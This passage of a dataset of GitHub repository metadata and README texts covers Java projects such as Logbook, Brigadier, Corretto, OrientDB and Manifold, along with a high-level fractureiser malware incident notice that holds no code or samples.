""logger_name"" : ""org.zalando.logbook.Logbook"",
""thread_name"" : ""main"",
""level"" : ""TRACE"",
""level_value"" : 5000,
""http"" : {
// logbook request/response contents
}
}
```
#### Customizing default Logging Level
You have the flexibility to customize the default logging level by initializing `LogstashLogbackSink` with a specific level. For instance:
```
LogstashLogbackSink sink = new LogstashLogbackSink(formatter, Level.INFO);
```
## Known Issues
1. The Logbook Servlet Filter interferes with downstream code using `getWriter` and/or `getParameter*()`. See [Servlet](#servlet) for more details.
2. The Logbook Servlet Filter does **NOT** support `ERROR` dispatch. You're strongly encouraged to not use it to produce error responses.
## Getting Help with Logbook
If you have questions, concerns, bug reports, etc., please file an issue in this repository's [Issue Tracker](https://github.com/zalando/logbook/issues).
## Getting Involved/Contributing
To contribute, simply make a pull request and add a brief description (1-2 sentences) of your addition or change. For
more details, check the [contribution guidelines](.github/CONTRIBUTING.md).
## Alternatives
- [Apache HttpClient Wire Logging](http://hc.apache.org/httpcomponents-client-4.5.x/logging.html)
- Client-side only
- Apache HttpClient exclusive
- Support for HTTP bodies
- [Spring Boot Access Logging](http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#howto-configure-accesslogs)
- Spring application only
- Server-side only
- Tomcat/Undertow/Jetty exclusive
- **No** support for HTTP bodies
- [Tomcat Request Dumper Filter](https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#Request_Dumper_Filter)
- Server-side only
- Tomcat exclusive
- **No** support for HTTP bodies
- [logback-access](http://logback.qos.ch/access.html)
- Server-side only
- Any servlet container
- Support for HTTP bodies
## Credits and References
![Creative Commons (Attribution-Share Alike 3.0 Unported](https://licensebuttons.net/l/by-sa/3.0/80x15.png)
[*Grand Turk, a replica of a three-masted 6th rate frigate from Nelson's days - logbook and charts*](https://commons.wikimedia.org/wiki/File:Grand_Turk(34).jpg)
by [JoJan](https://commons.wikimedia.org/wiki/User:JoJan) is licensed under a
[Creative Commons (Attribution-Share Alike 3.0 Unported)](http://creativecommons.org/licenses/by-sa/3.0/).
"
Mojang/brigadier,master,3322,374,2014-09-15T08:48:24Z,501,74,"Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition.",,"# Brigadier [![Latest release](https://img.shields.io/github/release/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/releases/latest) [![License](https://img.shields.io/github/license/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/blob/master/LICENSE)
Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition and now freely available for use elsewhere under the MIT license.
# Installation
Brigadier is available to Maven & Gradle via `libraries.minecraft.net`. Its group is `com.mojang`, and artifact name is `brigadier`.
## Gradle
First include our repository:
```groovy
maven {
url ""https://libraries.minecraft.net""
}
```
And then use this library (change `(the latest version)` to the latest version!):
```groovy
compile 'com.mojang:brigadier:(the latest version)'
```
## Maven
First include our repository:
```xml
minecraft-librariesMinecraft Librarieshttps://libraries.minecraft.net
```
And then use this library (change `(the latest version)` to the latest version!):
```xml
com.mojangbrigadier(the latest version)
```
# Contributing
Contributions are welcome! :D
Most contributions will require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to,
and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com.
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.
# Usage
At the heart of Brigadier, you need a `CommandDispatcher`, where `` is any custom object you choose to identify a ""command source"".
A command dispatcher holds a ""command tree"", which is a series of `CommandNode`s that represent the various possible syntax options that form a valid command.
## Registering a new command
Before we can start parsing and dispatching commands, we need to build up our command tree. Every registration is an append operation,
so you can freely extend existing commands in a project without needing access to the source code that created them.
Command registration also encourages the use of a builder pattern to keep code cruft to a minimum.
A ""command"" is a fairly loose term, but typically it means an exit point of the command tree.
Every node can have an `executes` function attached to it, which signifies that if the input stops here then this function will be called with the context so far.
Consider the following example:
```java
CommandDispatcher dispatcher = new CommandDispatcher<>();
dispatcher.register(
literal(""foo"")
.then(
argument(""bar"", integer())
.executes(c -> {
System.out.println(""Bar is "" + getInteger(c, ""bar""));
return 1;
})
)
.executes(c -> {
System.out.println(""Called foo with no arguments"");
return 1;
})
);
```
This snippet registers two ""commands"": `foo` and `foo `. It is also common to refer to the `` as a ""subcommand"" of `foo`, as it's a child node.
At the start of the tree is a ""root node"", and it **must** have `LiteralCommandNode`s as children. Here, we register one command under the root: `literal(""foo"")`, which means ""the user must type the literal string 'foo'"".
Under that is two extra definitions: a child node for possible further evaluation, or an `executes` block if the user input stops here.
The child node works exactly the same way, but is no longer limited to literals. The other type of node that is now allowed is an `ArgumentCommandNode`, which takes in a name and an argument type.
Arguments can be anything, and you are encouraged to build your own for seamless integration into your own product. There are some standard arguments included in brigadier, such as `IntegerArgumentType`.
Argument types will be asked to parse input as much as they can, and then store the ""result"" of that argument however they see fit or throw a relevant error if they can't parse.
For example, an integer argument would parse ""123"" and store it as `123` (`int`), but throw an error if the input were `onetwothree`.
When a command is actually run, it can access these arguments in the context provided to the registered function.
## Parsing user input
So, we've registered some commands and now we're ready to take in user input. If you're in a rush, you can just call `dispatcher.execute(""foo 123"", source)` and call it a day.
The result of `execute` is an integer that was returned from an evaluated command. The meaning of this integer depends on the command, and will typically not be useful to programmers.
The `source` is an object of ``, your own custom class to track users/players/etc. It will be provided to the command so that it has some context on what's happening.
If the command failed or could not parse, some form of `CommandSyntaxException` will be thrown. It is also possible for a `RuntimeException` to be bubbled up, if not properly handled in a command.
If you wish to have more control over the parsing & executing of commands, or wish to cache the parse results so you can execute it multiple times, you can split it up into two steps:
```java
final ParseResults parse = dispatcher.parse(""foo 123"", source);
final int result = execute(parse);
```
This is highly recommended as the parse step is the most expensive, and may be easily cached depending on your application.
You can also use this to do further introspection on a command, before (or without) actually running it.
## Inspecting a command
If you `parse` some input, you can find out what it will perform (if anything) and provide hints to the user safely and immediately.
The parse will never fail, and the `ParseResults` it returns will contain a *possible* context that a command may be called with
(and from that, you can inspect which nodes the user entered, complete with start/end positions in the input string).
It also contains a map of parse exceptions for each command node it encountered. If it couldn't build a valid context, then
the reason why is inside this exception map.
## Displaying usage info
There are two forms of ""usage strings"" provided by this library, both require a target node.
`getAllUsage(node, source, restricted)` will return a list of all possible commands (executable end-points) under the target node and their human readable path. If `restricted`, it will ignore commands that `source` does not have access to. This will look like [`foo`, `foo `].
`getSmartUsage(node, source)` will return a map of the child nodes to their ""smart usage"" human readable path. This tries to squash future-nodes together and show optional & typed information, and can look like `foo ()`.
[![GitHub forks](https://img.shields.io/github/forks/Mojang/brigadier.svg?style=social&label=Fork)](https://github.com/Mojang/brigadier/fork) [![GitHub stars](https://img.shields.io/github/stars/Mojang/brigadier.svg?style=social&label=Stars)](https://github.com/Mojang/brigadier/stargazers)
"
spring-cloud/spring-cloud-netflix,main,4845,2417,2014-07-11T15:46:12Z,20239,104,Integration with Netflix OSS components,cloud-native feign java microservices netflix-eureka netflix-hystrix netflix-zuul netflixoss ribbon spring spring-boot spring-cloud spring-cloud-core,
warmuuh/milkman,master,1057,68,2019-03-27T13:42:47Z,5999,17,An Extensible Request/Response Workbench,grpc hacktoberfest http milkman-plugins rest testing,
corretto/corretto-8,develop,2090,217,2018-11-07T19:49:10Z,221170,55,"Amazon Corretto 8 is a no-cost, multi-platform, production-ready distribution of OpenJDK 8",,"## Corretto 8
Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). Corretto is used internally at Amazon for production services. With Corretto, you can develop and run Java applications on operating systems such as Amazon Linux 2, Windows, and macOS.
The latest binary Corretto 8 release builds can be downloaded from [https://github.com/corretto/corretto-8/releases](https://github.com/corretto/corretto-8/releases).
Documentation is available at [https://docs.aws.amazon.com/corretto](https://docs.aws.amazon.com/corretto).
### Licenses and Trademarks
Please read these files: ""LICENSE"", ""THIRD_PARTY_README"", ""ASSEMBLY_EXCEPTION"", ""TRADEMARKS.md"".
### Branches
_develop_
: The default branch. It absorbs active development contributions from forks or topic branches via pull requests that pass smoke testing and are accepted.
_master_
: The stable branch. Starting point for the release process. It absorbs contributions from the develop branch that pass more thorough testing and are selected for releasing.
_ga-release_
: The source code of the GA release on 01/31/2019.
_preview-release_
: The source code of the preview release on 11/14/2018.
_release-8.XXX.YY.Z_
: The source code for each release is recorded by a branch or a tag with a name of this form. XXX stands for the OpenJDK 8 update number, YY for the OpenJDK 8 build number, and Z for the Corretto-specific revision number. The latter starts at 1 and is incremented in subsequent releases as long as the update and build number remain constant.
### OpenJDK Readme
```
Welcome to the JDK!
===================
For build instructions please see https://openjdk.java.net/groups/build/doc/building.html,
or either of these files:
- doc/building.html (html version)
- doc/building.md (markdown version)
See https://openjdk.java.net for more information about the OpenJDK Community and the JDK.
```
"
mvel/mvel,master,1043,303,2011-05-17T17:59:38Z,14610,131,MVEL (MVFLEX Expression Language),,"# MVEL
MVFLEX Expression Language (MVEL) is a hybrid dynamic/statically typed, embeddable Expression Language and runtime for the Java Platform.
## Document
http://mvel.documentnode.com/
## How to build
```
git clone https://github.com/mvel/mvel.git
cd mvel
mvn clean install
```
"
orientechnologies/orientdb,develop,4690,866,2012-12-09T20:33:47Z,265001,292,"OrientDB is the most versatile DBMS supporting Graph, Document, Reactive, Full-Text and Geospatial models in one Multi-Model product. OrientDB can run distributed (Multi-Master), supports SQL, ACID Transactions, Full-Text indexing and Reactive Queries.",database dbms document-database fast graph-database graph-store multi-master multi-model-dbms nosql orientdb performance sql,"## OrientDB
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![REUSE status](https://api.reuse.software/badge/github.com/orientechnologies/orientdb)](https://api.reuse.software/info/github.com/orientechnologies/orientdb)
------
## What is OrientDB?
**OrientDB** is an Open Source Multi-Model [NoSQL](http://en.wikipedia.org/wiki/NoSQL) DBMS with the support of Native Graphs, Documents,
Full-Text search, Reactivity, Geo-Spatial and Object Oriented concepts. It's written in Java and it's amazingly fast.
No expensive run-time JOINs, connections are managed as persistent pointers between records.
You can traverse thousands of records in no time. Supports schema-less, schema-full and schema-mixed modes.
Has a strong security profiling system based on user, roles and predicate security and supports [SQL](https://orientdb.org/docs/3.1.x/sql/) amongst the query languages.
Thanks to the [SQL](https://orientdb.org/docs/3.1.x/sql/) layer it's straightforward to use for people skilled in the Relational world.
[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/) |
[OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) |
[Dev Updates](https://fosstodon.org/@orientdb) |
[Community Chat](https://matrix.to/#/#orientdb-community:matrix.org) .
## Is OrientDB a Relational DBMS?
No. OrientDB adheres to the [NoSQL](http://en.wikipedia.org/wiki/NoSQL) movement even though it supports [ACID Transactions](https://orientdb.org/docs/3.2.x/internals/Transactions.html) and
[SQL](https://orientdb.org/docs/3.2.x/sql/) as query language. In this way it's easy to start using it without having to learn too much new stuff.
## Easy to install and use
Yes. OrientDB is totally written in [Java](http://en.wikipedia.org/wiki/Java_%28programming_language%29) and can run on any platform without configuration and installation.
Do you develop with a language different than Java? No problem, look at the [Programming Language Binding](http://orientdb.org/docs/3.1.x/apis-and-drivers/).
## Main References
- [Documentation Version < 3.2.x](http://orientdb.org/docs/3.1.x/)
- For any questions visit the [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions)
[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/).
--------
## Contributing
For the guide to contributing to OrientDB checkout the [CONTRIBUTING.MD](https://github.com/orientechnologies/orientdb/blob/develop/CONTRIBUTING.md)
All the contribution are considered licensed under Apache-2 license if not stated otherwise.
--------
## Licensing
OrientDB is licensed by OrientDB LTD under the Apache 2 license. OrientDB relies on the following 3rd party libraries, which are compatible with the Apache license:
- Javamail: CDDL license (http://www.oracle.com/technetwork/java/faq-135477.html)
- java persistence 2.0: CDDL license
- JNA: Apache 2 (https://github.com/twall/jna/blob/master/LICENSE)
- Hibernate JPA 2.0 API: Eclipse Distribution License 1.0
- ASM: OW2
References:
- Apache 2 license (Apache2):
http://www.apache.org/licenses/LICENSE-2.0.html
- Common Development and Distribution License (CDDL-1.0):
http://opensource.org/licenses/CDDL-1.0
- Eclipse Distribution License (EDL-1.0):
http://www.eclipse.org/org/documents/edl-v10.php (http://www.eclipse.org/org/documents/edl-v10.php)
### Sponsors
[![](http://s1.softpedia-static.com/_img/sp100free.png?1)](http://www.softpedia.com/get/Internet/Servers/Database-Utils/OrientDB.shtml#status)
--------
### Reference
Recent architecture re-factoring and improvements are described in our [BICOD 2021](http://ceur-ws.org/Vol-3163/BICOD21_paper_3.pdf) paper:
```
@inproceedings{DBLP:conf/bncod/0001DLT21,
author = {Daniel Ritter and
Luigi Dell'Aquila and
Andrii Lomakin and
Emanuele Tagliaferri},
title = {OrientDB: {A} NoSQL, Open Source {MMDMS}},
booktitle = {Proceedings of the The British International Conference on Databases
2021, London, United Kingdom, March 28, 2022},
series = {{CEUR} Workshop Proceedings},
volume = {3163},
pages = {10--19},
publisher = {CEUR-WS.org},
year = {2021}
}
```
"
zhoutaoo/SpringCloud,master,8529,3855,2017-07-23T14:28:08Z,10069,56,基于SpringCloud2.1的微服务开发脚手架,整合了spring-security-oauth2、nacos、feign、sentinel、springcloud-gateway等。服务治理方面引入elasticsearch、skywalking、springboot-admin、zipkin等,让项目开发快速进入业务开发,而不需过多时间花费在架构搭建上。持续更新中,elasticsearch eureka feign-client hystrix jetcache moss nacos oauth2 sentinel skywalking spring-cloud-gateway spring-security springboot springboot-admin springboot-springcloud springcloud zipkin zipkin-sleuth,
fractureiser-investigation/fractureiser,main,1118,74,2023-06-07T15:59:56Z,14837,12,Information about the fractureiser malware,,"
**Translations to other languages:**
*These were made at varying times in this document's history and **may be outdated** — especially the current status in README.md.*
* [简体中文版本见此](./lang/zh-CN/)
* [Polska wersja](./lang/pl-PL/)
* [Читать на русском языке](./lang/ru-RU/)
* [한국어는 이곳으로](./lang/ko-KR/)
* Many others that are unfinished can be found in [Pull Requests](https://github.com/fractureiser-investigation/fractureiser/pulls)
## What?
`fractureiser` is a [virus](https://en.wikipedia.org/wiki/Computer_virus) found in several Minecraft projects uploaded to CurseForge and BukkitDev. The malware is embedded in multiple mods, some of which were added to highly popular modpacks. The malware is only known to target Windows and Linux.
If left unchecked, fractureiser can be **INCREDIBLY DANGEROUS** to your machine. Please read through this document for the info you need to keep yourself safe.
We've dubbed this malware fractureiser because that's the name of the CurseForge account that uploaded the most notable malicious files.
## Current Investigation Status
The fractureiser event has ended — no follow-up Stage0s were ever discovered and no further evidence of activity has been discovered in the past 3 months.
A third C&C was never stood up to our knowledge.
A copycat malware is still possible — and likely inevitable — but *fractureiser* is dead. **Systems that are already infected are still cause for concern**, and the below user documentation is still relevant.
## Follow-Up Meeting
On 2023-06-08 the fractureiser Mitigation Team held a meeting with notable members of the community to discuss preventive measures and solutions for future problems of this scale.
See [this page](https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/2023-06-08-meeting.md) for the agenda and minutes of the event.
## BlanketCon Panel
emilyploszaj and jaskarth, core members of the team, held a panel at BlanketCon 23 about the fractureiser mitigation effort. You can find a [recording of the panel by quat on YouTube](https://youtu.be/9eBmqHAk9HI).
## What YOU need to know
### [Modded Players CLICK HERE](docs/users.md)
If you're simply a mod player and not a developer, the above link is all you need. It contains surface level information of the malware's effects, steps to check if you have it and how to remove it, and an FAQ.
Anyone who wishes to dig deeper may also look at
* [Event Timeline](docs/timeline.md)
* [Technical Breakdown](docs/tech.md)
### I have never used any Minecraft mods
You are not infected.
## Additional Info
We've stopped receiving new unique samples, so the sample submission inbox is closed. If you would like to get in contact with the team, please shoot an email to `fractureiser@unascribed.com`.
If you copy portions of this document elsewhere, *please* put a prominent link back to this [GitHub Repository](https://github.com/fractureiser-investigation/fractureiser) somewhere near the top so that people can read the latest updates and get in contact.
The **only** official public channel that this team ever used for coordination was #cfmalware on EsperNet. ***We have no affiliation with any Discord guilds.***
**Do not ask for samples.** If you have experience and credentials, that's great, but we have no way to verify this without using up tons of our team's limited time. Sharing malware samples is dangerous, even among people who know what they're doing.
---
\- the [fractureiser Mitigation Team](docs/credits.md)
"
manifold-systems/manifold,master,2209,120,2017-06-07T02:37:23Z,126336,63,"Manifold is a Java compiler plugin, its features include Metaprogramming, Properties, Extension Methods, Operator Overloading, Templates, a Preprocessor, and more.",android-studio delegation duck-typing extension-methods graphql graphql-java intellij java java-development java-sql java-tooling js-java-interoperability json manifold metaprogramming preprocessor reflection-framework structural-typing template-engine type-providers,"
![latest](https://img.shields.io/badge/latest-v2024.1.12-royalblue.svg)
[![slack](https://img.shields.io/badge/slack-manifold-seagreen.svg?logo=slack)](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg)
[![GitHub Repo stars](https://img.shields.io/github/stars/manifold-systems/manifold?logo=github&style=flat&color=tan)](https://github.com/manifold-systems/manifold)
---
## What is Manifold?
Manifold is a Java compiler plugin. It supplements Java with:
* Direct, _type-safe_ access to:
* [SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) _**(New!)**_
* [GraphQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
* [JSON & JSON Schema](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json),
[YAML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml),
[XML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)
* [CSV](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)
* [JavaScript](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)
* etc.
* [Extension methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
* [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
* [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
* [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
* [Operator overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading)
* [Unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions)
* [A *Java* template engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
* [A preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
* ...and more
All fully supported in JDK LTS releases 8 - 21 + latest with comprehensive IDE support in **IntelliJ IDEA** and **Android Studio**.
Manifold consists of a set of modules, one for each feature. Simply add the Manifold dependencies of your choosing to your existing project and begin taking advantage of them.
># _**What's New...**_
>
>[](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md)
>
>### [Type-safe SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md)
> Manifold SQL lets you write native SQL _directly_ and _type-safely_ in your Java code.
>- Query types are instantly available as you type native SQL of any complexity in your Java code
>- Schema types are automatically derived from your database, providing type-safe CRUD, decoupled TX, and more
>- No ORM, No DSL, No wiring, and No code generation build steps
>
> [![img_3.png](./docs/images/img_3.png)](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md)
## Who is using Manifold?
Sampling of companies using Manifold:
## What can you do with Manifold?
### [Meta-programming](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)
Use the framework to gain direct, type-safe access to *any* type of resource, such as
[**SQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql),
[**JSON**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json),
[**GraphQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql),
[**XML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml),
[**YAML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml),
[**CSV**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv), and even
other languages such as [**JavaScript**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js).
Remove the code gen step in your build process. [ **▶** Check it out!](http://manifold.systems/images/graphql.mp4)
[**SQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)
Use _native_ SQL of any complexity _directly_ and _type-safely_ from Java.
```java
Language english =
""[.sql/]select * from Language where name = 'English'"".fetchOne();
Film film = Film.builder(""My Movie"", english)
.withDescription(""Nice movie"")
.withReleaseYear(2023)
.build();
MyDatabase.commit();
```
[**GraphQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
Use types defined in .graphql files *directly*, no code gen steps! Make GraphQL changes and immediately use them with code completion.
```java
var query = MovieQuery.builder(Action).build();
var result = query.request(""http://com.example/graphql"").post();
var actionMovies = result.getMovies();
for (var movie : actionMovies) {
out.println(
""Title: "" + movie.getTitle() + ""\n"" +
""Genre: "" + movie.getGenre() + ""\n"" +
""Year: "" + movie.getReleaseDate().getYear() + ""\n"");
}
```
[**JSON:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)
Use .json schema files directly and type-safely, no code gen steps! Find usages of .json properties in your Java code.
```java
// From User.json
User user = User.builder(""myid"", ""mypassword"", ""Scott"")
.withGender(male)
.withDob(LocalDate.of(1987, 6, 15))
.build();
User.request(""http://api.example.com/users"").postOne(user);
```
### [Extension Methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
Add your own methods to existing Java classes, even *String*, *List*, and *File*. Eliminate boilerplate code.
[ **▶** Check it out!](http://manifold.systems/images/ExtensionMethod.mp4)
```java
String greeting = ""hello"";
greeting.myMethod(); // Add your own methods to String!
```
### [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
Favor composition over inheritance. Use `@link` and `@part` for automatic interface implementation forwarding and _true_ delegation.
> ```java
> class MyClass implements MyInterface {
> @link MyInterface myInterface; // transfers calls on MyInterface to myInterface
>
> public MyClass(MyInterface myInterface) {
> this.myInterface = myInterface; // dynamically configure behavior
> }
>
> // No need to implement MyInterface here, but you can override myInterface as needed
> }
> ```
### [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
Eliminate boilerplate getter/setter code, improve your overall dev experience with properties.
```java
public interface Book {
@var String title; // no more boilerplate code!
}
// refer to it directly by name
book.title = ""Daisy""; // calls setter
String name = book.title; // calls getter
book.title += "" chain""; // calls getter & setter
```
Additionally, the feature automatically _**infers**_ properties, both from your existing source files and from
compiled classes your project uses. Reduce property use from this:
```java
Actor person = result.getMovie().getLeadingRole().getActor();
Likes likes = person.getLikes();
likes.setCount(likes.getCount() + 1);
```
to this:
```java
result.movie.leadingRole.actor.likes.count++;
```
### [Operator Overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading)
Implement *operator* methods on any type to directly support arithmetic, relational, index, and unit operators.
```java
// BigDecimal expressions
if (bigDec1 > bigDec2) {
BigDecimal result = bigDec1 + bigDec2;
...
}
// Implement operators for any type
MyType value = myType1 + myType2;
```
### [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
Tuple expressions provide concise syntax to group named data items in a lightweight structure.
```java
var t = (name: ""Bob"", age: ""35"");
System.out.println(""Name: "" + t.name + "" Age: "" + t.age);
var t = (person.name, person.age);
System.out.println(""Name: "" + t.name + "" Age: "" + t.age);
```
You can also use tuples with new [`auto` type inference](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-inference-with-auto) to enable multiple return values from a method.
### [Unit Expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions)
Unit or *binding* operations are unique to the Manifold framework. They provide a powerfully concise syntax and can be
applied to a wide range of applications.
```java
import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc
...
Length distance = 100 mph * 3 hr;
Force f = 5.2 kg m/s/s; // same as 5.2 N
Mass infant = 9 lb + 8.71 oz;
```
### [Ranges](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections#ranges)
Easily work with the *Range* API using [unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions).
Simply import the *RangeFun* constants to create ranges.
```java
// imports the `to`, `step`, and other ""binding"" constants
import static manifold.collections.api.range.RangeFun.*;
...
for (int i: 1 to 5) {
out.println(i);
}
for (Mass m: 0kg to 10kg step 22r unit g) {
out.println(m);
}
```
### [Science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
Use the [manifold-science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
framework to type-safely incorporate units and precise measurements into your applications.
```java
import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc.
...
Velocity rate = 65mph;
Time time = 1min + 3.7sec;
Length distance = rate * time;
```
### [Preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
Use familiar directives such as **#define** and **#if** to conditionally compile your Java projects. The preprocessor offers
a simple and convenient way to support multiple build targets with a single codebase. [ **▶** Check it out!](http://manifold.systems/images/preprocessor.mp4)
```java
#if JAVA_8_OR_LATER
@Override
public void setTime(LocalDateTime time) {...}
#else
@Override
public void setTime(Calendar time) {...}
#endif
```
### [Structural Typing](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#structural-interfaces-via-structural)
Unify disparate APIs. Bridge software components you do not control. Access maps through type-safe interfaces. [ **▶** Check it out!](http://manifold.systems/images/structural%20typing.mp4)
```java
Map map = new HashMap<>();
MyThingInterface thing = (MyThingInterface) map; // O_o
thing.setFoo(new Foo());
Foo foo = thing.getFoo();
out.println(thing.getClass()); // prints ""java.util.HashMap""
```
### [Type-safe Reflection](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-safe-reflection-via-jailbreak)
Access private features with @Jailbreak to avoid the drudgery and vulnerability of Java reflection. [ **▶** Check it out!](http://manifold.systems/images/jailbreak.mp4)
```java
@Jailbreak Foo foo = new Foo();
// Direct, *type-safe* access to *all* foo's members
foo.privateMethod(x, y, z);
foo.privateField = value;
```
### [Checked Exception Handling](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)
You now have an option to make checked exceptions behave like unchecked exceptions! No more unintended exception
swallowing. No more *try*/*catch*/*wrap*/*rethrow* boilerplate!
```java
List strings = ...;
List urls = strings.stream()
.map(URL::new) // No need to handle the MalformedURLException!
.collect(Collectors.toList());
```
### [String Templates](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)
Inline variables and expressions in String literals, no more clunky string concat! [ **▶** Check it out!](http://manifold.systems/images/string_interpolation.mp4)
```java
int hour = 15;
// Simple variable access with '$'
String result = ""The hour is $hour""; // Yes!!!
// Use expressions with '${}'
result = ""It is ${hour > 12 ? hour-12 : hour} o'clock"";
```
### [A *Java* Template Engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
Author template files with the full expressive power of Java, use your templates directly in your code as types.
Supports type-safe inclusion of other templates, shared layouts, and more. [ **▶** Check it out!](http://manifold.systems/images/mantl.mp4)
```java
List users = ...;
String content = abc.example.UserSample.render(users);
```
A template file *abc/example/UserSample.html.mtl*
```html
<%@ import java.util.List %>
<%@ import com.example.User %>
<%@ params(List users) %>
<% for(User user: users) { %>
<% if(user.getDateOfBirth() != null) { %>
User: ${user.getName()}
DOB: ${user.getDateOfBirth()}
<% } %>
<% } %>
```
## [IDE Support](https://github.com/manifold-systems/manifold)
Use the [Manifold plugin](https://plugins.jetbrains.com/plugin/10057-manifold) to fully leverage
Manifold with **IntelliJ IDEA** and **Android Studio**. The plugin provides comprehensive support for Manifold including code
completion, navigation, usage searching, refactoring, incremental compilation, hotswap debugging, full-featured
template editing, integrated preprocessor, and more.
[Get the plugin from JetBrains Marketplace](https://plugins.jetbrains.com/plugin/10057-manifold)
## [Projects](https://github.com/manifold-systems/manifold)
The Manifold project consists of the core Manifold framework and a collection of sub-projects implementing SPIs provided
by the core framework. Each project consists of one or more **dependencies** you can easily add to your project:
[Manifold : _Core_](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)
[Manifold : _Extensions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
[Manifold : _Delegation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
[Manifold : _Properties_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
[Manifold : _Tuples_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
[Manifold : _SQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)
[Manifold : _GraphQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
[Manifold : _JSON_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)
[Manifold : _XML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)
[Manifold : _YAML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml)
[Manifold : _CSV_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)
